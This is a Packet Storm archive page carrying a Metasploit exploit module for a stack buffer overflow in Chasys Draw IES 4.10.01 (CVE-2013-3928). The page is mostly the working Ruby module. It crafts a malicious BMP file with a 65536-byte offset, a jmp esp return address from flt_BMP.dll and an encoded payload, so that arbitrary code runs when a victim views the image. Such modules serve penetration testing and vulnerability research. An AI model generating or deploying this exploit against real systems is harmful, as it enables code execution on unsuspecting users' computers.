exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Chasys Draw IES Buffer Overflow

Chasys Draw IES Buffer Overflow
Posted Aug 14, 2013
Authored by juan vazquez, Javier Soez, Longinos Recuero Bustos, Christopher Gabriel | Site metasploit.com

This Metasploit module exploits a buffer overflow vulnerability found in Chasys Draw IES (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while parsing BMP files, where the ReadFile function is used to store user provided data on the stack in a insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted BMP file. This Metasploit module has been tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7 SP1.

tags | exploit, overflow, arbitrary, code execution
systems | windows
advisories | CVE-2013-3928
SHA-256 | 56e7fba84288627ba505da717c62532dbb987a53ddb5f03f8701ff982a5809ad

Chasys Draw IES Buffer Overflow

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT

def initialize(info={})
super(update_info(info,
'Name' => "Chasys Draw IES Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow vulnerability found in Chasys Draw IES
(version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while
parsing BMP files, where the ReadFile function is used to store user provided data
on the stack in a insecure way. It results in arbitrary code execution under the
context of the user viewing a specially crafted BMP file. This module has been
tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7
SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Christopher Gabriel', # Vulnerability Discovery
'Longinos Recuero Bustos', # PoC
'Javier \'soez\'', # PoC
'juan vazquez' # Metasploit
],
'References' =>
[
[ 'CVE', '2013-3928' ],
[ 'BID', '61463' ],
[ 'URL', 'http://secunia.com/advisories/53773/' ],
[ 'URL', 'http://longinox.blogspot.com/2013/08/explot-stack-based-overflow-bypassing.html' ]
],
'Payload' =>
{
'Space' => 21112, # Indeed there is more space available on the stack, just limited by the trigger
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Chasys Draw IES 4.10.01 / Windows XP SP3 / Windows 7 SP1',
{
'Offset' => 65536,
'Ret' => 0x10005fd3 # jmp esp # from flt_BMP.dll v4.10.1.0
}
],
],
'Privileged' => false,
'DisclosureDate' => "Jul 26 2013",
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.bmp']),
], self.class)

end

def exploit

bof = rand_text(target['Offset'])
bof << [target.ret].pack("V")
bof << payload.encoded

bitmap_header = ""
bitmap_header << [0x28].pack("V") # HeaderSize
bitmap_header << [0x4a3].pack("V") # Width # Used to trigger the overflow
bitmap_header << [0x1].pack("V") # Height
bitmap_header << [0x9].pack("v") # Planes # Used to trigger the overflow
bitmap_header << [0x41].pack("v") # BitCount # Used to trigger the overflow
bitmap_header << [0x0].pack("V") # Compression
bitmap_header << [bof.length].pack("V") # SizeImage
bitmap_header << [0x0].pack("V") # PelsPerMeterX
bitmap_header << [0x0].pack("V") # PelsPerMeterY
bitmap_header << [0x0].pack("V") # ClrUse
bitmap_header << [0x0].pack("V") # ClrImportant

total_size = bof.length + bitmap_header.length + 14 # 14 => file header length

file_header = ""
file_header << "BM" # Signature
file_header << [total_size].pack("V") # Size
file_header << [0].pack("V") # Reserved
file_header << [0x36].pack("V") # BitsOffsets

bmp = file_header + bitmap_header + bof
file_create(bmp)
end
end

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close